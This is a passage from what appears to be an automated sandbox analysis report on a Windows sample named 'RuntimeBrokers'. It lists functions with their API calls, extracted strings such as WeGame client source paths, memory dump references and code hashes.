                                        • Opcode ID: a8bded341d61e86a10c9a34b5296769e3b6be0e5d188145242926da820918622
                                        • Instruction ID: 569d751e09636808f726520aebecfb6a2aa3d4338d198ddc5df732e294912eda
                                        • Opcode Fuzzy Hash: a8bded341d61e86a10c9a34b5296769e3b6be0e5d188145242926da820918622
                                        • Instruction Fuzzy Hash: D541D771E042099FDB08CFE8C854BEEBBF5EF09314F144528E825A7782D739A955CBA1
                                        Function 004685EA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLogicalDriveStringsW.KERNEL32(00000208,?), ref: 0046864B
                                        • QueryDosDeviceW.KERNEL32(00000000,?,00000208), ref: 004686C1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: DeviceDriveLogicalQueryStrings
                                        • String ID: %s%s
                                        • API String ID: 3173366581-3252725368
                                        • Opcode ID: 379a4937888c0fed09cdced84de1f6533c0fc239e769053b4c603b2e45a0cbe9
                                        • Instruction ID: fb4699b6a72cfd4762acc62dc6b75ee6f191f025d87f6c9be0b9e7a2855c3f96
                                        • Opcode Fuzzy Hash: 379a4937888c0fed09cdced84de1f6533c0fc239e769053b4c603b2e45a0cbe9
                                        • Instruction Fuzzy Hash: 1F41417490021CDBDB20DF24CC85BAAB7F4BF44705F1081AAE949E6250EF789B84CF99
                                        Function 00424281 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: _wcsstr
                                        • String ID: *'
                                        • API String ID: 1512112989-2344119228
                                        • Opcode ID: b747c7346f6c6aa6d17f3b9a72f9b26989c301dd9abca46a3016115d479aa281
                                        • Instruction ID: 3ee8d372096f6d338dbab2c425a7ff6d78ca40598670ad8e94c48b35a315a719
                                        • Opcode Fuzzy Hash: b747c7346f6c6aa6d17f3b9a72f9b26989c301dd9abca46a3016115d479aa281
                                        • Instruction Fuzzy Hash: 4B41F875A04629DFDF15CF98E8857EEBBB0FB44314F50452AE821AB380C3B89994CF59
                                        Function 6C1525A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 106COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_catch_GS.LIBCMT ref: 6C1525AA
                                          • Part of subcall function 6C0D27B2: __EH_prolog3.LIBCMT ref: 6C0D27B9
                                          • Part of subcall function 6C14CF24: __EH_prolog3.LIBCMT ref: 6C14CF2B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3$H_prolog3_catch_
                                        • String ID: ://(\S+)/$wegame
                                        • API String ID: 2899319929-1479293945
                                        • Opcode ID: c3b16875e1a94186d6ce443956d14e778df12751952714767f8a9ac3b0bb7da0
                                        • Instruction ID: cbfbaa0ac235a5ef0e0766717fe2a95224124bd28eec636a10d027bcdfc586b0
                                        • Opcode Fuzzy Hash: c3b16875e1a94186d6ce443956d14e778df12751952714767f8a9ac3b0bb7da0
                                        • Instruction Fuzzy Hash: 3B4144B1C01248DECF04DFA8C984BDEBBB4AF65308F508098D515BB790EB786E09CB61
                                        Function 0040A0BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetPrivateProfileStringW.KERNEL32(Redirect,Path,00000000,?,00000104,004095F9), ref: 0040A106
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: PrivateProfileString
                                        • String ID: Path$Redirect
                                        • API String ID: 1096422788-3112682714
                                        • Opcode ID: 55e8764da4819b3f7ecc874164e89d934685ba79f243185dc5eecd8fb79c32fd
                                        • Instruction ID: 05b9b1d040b3232bd381373300eef53793646ddec7e3acbb278b605a5e670f48
                                        • Opcode Fuzzy Hash: 55e8764da4819b3f7ecc874164e89d934685ba79f243185dc5eecd8fb79c32fd
                                        • Instruction Fuzzy Hash: DA411B7094021CEFDF209F14DC89BE977B4AB14309F1044EAE819AA2D1D7B99EE4CF56
                                        Function 6C0DA9E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID: /$\
                                        • API String ID: 431132790-1600464054
                                        • Opcode ID: 44977232cabb36c9b1b505e1eaffd10bd418b6a013c709c404c713851468c387
                                        • Instruction ID: 3b998af8d13a0aa0f4815688f0b4acfe5ff1949a8c6998ce343008bace449529
                                        • Opcode Fuzzy Hash: 44977232cabb36c9b1b505e1eaffd10bd418b6a013c709c404c713851468c387
                                        • Instruction Fuzzy Hash: 3A31197550020DEFCF04DF98C890AEE77F8AF58318F618259F8255B690D774EA09CB51
                                        Function 6C17F8B2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C17F8B9
                                        • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000024,6C17E005,?), ref: 6C17F946
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3_tolower
                                        • String ID: T3Bl
                                        • API String ID: 2132562476-3310165204
                                        • Opcode ID: 29c26a666759552e25652e100021e6d730d89f13b6bc14fd1c8446c5ee4b90eb
                                        • Instruction ID: 74670841b23ebbc120444fd1b2704c03678e33428b4b429e5725982c019bf88c
                                        • Opcode Fuzzy Hash: 29c26a666759552e25652e100021e6d730d89f13b6bc14fd1c8446c5ee4b90eb
                                        • Instruction Fuzzy Hash: 30318D31901219EFCB24DF54C054AEEB7B5FB08324F9500A9E151BBA60DB70EA95CBA1
                                        Function 6C12BC07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C12BC0E
                                        • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,http,?,?,00000030,6C12B9D5,?,?,000000C4,6C12BB20,?,?,000000B0,6C12BAB2,?,?), ref: 6C12BC81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3__stricmp
                                        • String ID: http
                                        • API String ID: 3123111935-2541227442
                                        • Opcode ID: 06b2087878f61027ff272becde3fdc9435256810222112e42ed9487ccb595d67
                                        • Instruction ID: ecbae0c1f9f16f4a287a77063e290f3117abffdc7b523513b712847cc1b3ebe5
                                        • Opcode Fuzzy Hash: 06b2087878f61027ff272becde3fdc9435256810222112e42ed9487ccb595d67
                                        • Instruction Fuzzy Hash: 5821AD75C06208EFDF04DF98D4906EDBBB4EF19314F64001EE441BB641DB796A89CBA1
                                        Function 0048A451 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcAddress.KERNEL32(F107BA66,RealeaseIIPSRepair), ref: 0048A4ED
                                        • FreeLibrary.KERNEL32(00000000), ref: 0048A51B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: AddressFreeLibraryProc
                                        • String ID: RealeaseIIPSRepair
                                        • API String ID: 3013587201-655049130
                                        • Opcode ID: f01802c8f6542a8a7e0411606478290022c101ec4b00baf573700cad7433e7a2
                                        • Instruction ID: 0e2ade7ebe83537a46c06a77dfa3c6fee6d7ed188db580d71f0cfc5b84886ff5
                                        • Opcode Fuzzy Hash: f01802c8f6542a8a7e0411606478290022c101ec4b00baf573700cad7433e7a2
                                        • Instruction Fuzzy Hash: F5310574904609DFDB00DF88D989BAEBBF0FF05316F24016AE405A72A0C3786D40CF51
                                        Function 6C1028FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 6C102928
                                        • GetLastError.KERNEL32 ref: 6C102932
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: AttributesErrorFileLast
                                        • String ID: ierd_tgp::filesystem::file_size
                                        • API String ID: 1799206407-529503565
                                        • Opcode ID: fee5c02e6c1426a21201ad55c38f4901895d183231afadee4b9845e9b5788d8a
                                        • Instruction ID: 7dd7c7e051ce9de4c5f99bf7dbad028fff6ca9f7dd0735a1715c75dc8ff10697
                                        • Opcode Fuzzy Hash: fee5c02e6c1426a21201ad55c38f4901895d183231afadee4b9845e9b5788d8a
                                        • Instruction Fuzzy Hash: 6B11CE71B00218ABDB209F69CC49BAA77FCEF46368F044658F854E7240DB34ED048660
                                        Function 6C0DA22B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0DA232
                                        • OutputDebugStringW.KERNEL32(00000000,?,00000000,/,|<>:#$%{}[]'"^!?+* ,00000038,00000000,00000008,?,?,6C1064F9,00000000,?,?,00000004,6C10A1B9,?), ref: 6C0DA2BF
                                          • Part of subcall function 6C0D3758: __EH_prolog3.LIBCMT ref: 6C0D375F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: DebugH_prolog3H_prolog3_OutputString
                                        • String ID: /,|<>:#$%{}[]'"^!?+*
                                        • API String ID: 823437553-825407933
                                        • Opcode ID: 8352db9f18bdc83cca3c756c33d101e40ec3968319924c207a5bc3531e248a04
                                        • Instruction ID: 16652947aaaff697b4189ff6737a45554eaadf292a46a5e8a91ab8c41dd27da3
                                        • Opcode Fuzzy Hash: 8352db9f18bdc83cca3c756c33d101e40ec3968319924c207a5bc3531e248a04
                                        • Instruction Fuzzy Hash: 4821C370905348DFCF00CFA8C8457EEBBF8AF09318F550159E115A7A90C734BA49CBA1
                                        Function 6C30FE60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • socket.WS2_32(00000002,00000001,00000000), ref: 6C310236
                                        • socket.WS2_32(00000002,00000002,00000000), ref: 6C310246
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: socket
                                        • String ID: type
                                        • API String ID: 98920635-2363381545
                                        • Opcode ID: b619b7c1ab0aa7b99dc1b3456a1d3d49ea1214ffddcf1a0f3cbb2b3f4a528720
                                        • Instruction ID: 7348ae62dcf5ac0e39bbf9dbf7e35537b9c13340a2f0d9615d28ee55fd7ef15d
                                        • Opcode Fuzzy Hash: b619b7c1ab0aa7b99dc1b3456a1d3d49ea1214ffddcf1a0f3cbb2b3f4a528720
                                        • Instruction Fuzzy Hash: AB11AB737082405ADB004A345CA2F867F669F8A31CF480680F488CBAD3C353C405CD59
                                        Function 6C0E6917 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6C0E4133: __EH_prolog3.LIBCMT ref: 6C0E413A
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C0E6967
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                        Strings
                                        • d:\ci_dev\wegame_client\codes\common\src\cfg_file.cpp, xrefs: 6C0E698B
                                        • filesystem_error in copy_if_notexist: %1%, xrefs: 6C0E6917
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3$?get_log_instance@base@@Logger@1@
                                        • String ID: d:\ci_dev\wegame_client\codes\common\src\cfg_file.cpp$filesystem_error in copy_if_notexist: %1%
                                        • API String ID: 1369574949-2601342785
                                        • Opcode ID: 1b64b2632443d2864d3991d98a1e42b90380ccc87499cc2881b4c3a2bbfa3d59
                                        • Instruction ID: 724be1ab1285345ca99b1d5a1e0227f0cc498caf364f9801b1d0bbb0e24c41b2
                                        • Opcode Fuzzy Hash: 1b64b2632443d2864d3991d98a1e42b90380ccc87499cc2881b4c3a2bbfa3d59
                                        • Instruction Fuzzy Hash: C1115831901118EFDB15DBA4CD64BEDB7A4AF55308F2081D8D505ABA80EF36AF09DB92
                                        Function 6C0E69D8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6C0E4133: __EH_prolog3.LIBCMT ref: 6C0E413A
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C0E6A28
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                        Strings
                                        • d:\ci_dev\wegame_client\codes\common\src\cfg_file.cpp, xrefs: 6C0E6A4C
                                        • std exception in copy_if_notexist: %1%, xrefs: 6C0E69D8
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3$?get_log_instance@base@@Logger@1@
                                        • String ID: d:\ci_dev\wegame_client\codes\common\src\cfg_file.cpp$std exception in copy_if_notexist: %1%
                                        • API String ID: 1369574949-137779819
                                        • Opcode ID: 9fd7ee964eb0c35360a27a5d6281393f5dd950c26a4501f7acce25d821fa5dda
                                        • Instruction ID: 6469eb948c89cc105c52166c48f13a8ccb9d69c14fe41cf1a54eadf301b85e40
                                        • Opcode Fuzzy Hash: 9fd7ee964eb0c35360a27a5d6281393f5dd950c26a4501f7acce25d821fa5dda
                                        • Instruction Fuzzy Hash: 43119A31901118AFCB15DBA4CD64BEDB3A4AF15308F2081D8D505BBA80EB36AF09DF92
                                        Function 6C0EA03F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6C0E4133: __EH_prolog3.LIBCMT ref: 6C0E413A
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C0EA08F
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                        Strings
                                        • d:\ci_dev\wegame_client\codes\common\src\cfg_file_model.cpp, xrefs: 6C0EA0B3
                                        • filesystem_error in copy_if_notexist: %1%, xrefs: 6C0EA03F
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3$?get_log_instance@base@@Logger@1@
                                        • String ID: d:\ci_dev\wegame_client\codes\common\src\cfg_file_model.cpp$filesystem_error in copy_if_notexist: %1%
                                        • API String ID: 1369574949-290179427
                                        • Opcode ID: 58fc8fbaac7898d215a5ae015efa3b053ecf27ce1a392178cb6c841571578af5
                                        • Instruction ID: fd4ddeed0dcfd5a8183ea7df0b8ed3070d6b54544a7a87a0bd4f18fff4143ee8
                                        • Opcode Fuzzy Hash: 58fc8fbaac7898d215a5ae015efa3b053ecf27ce1a392178cb6c841571578af5
                                        • Instruction Fuzzy Hash: C5119A30901118AFDB10DBA4CD64BDDB7F4AF59308F2081D8D0057B680EB36AF09DB92
                                        Function 6C0EA100 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6C0E4133: __EH_prolog3.LIBCMT ref: 6C0E413A
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C0EA150
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                        Strings
                                        • d:\ci_dev\wegame_client\codes\common\src\cfg_file_model.cpp, xrefs: 6C0EA174
                                        • std exception in copy_if_notexist: %1%, xrefs: 6C0EA100
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3$?get_log_instance@base@@Logger@1@
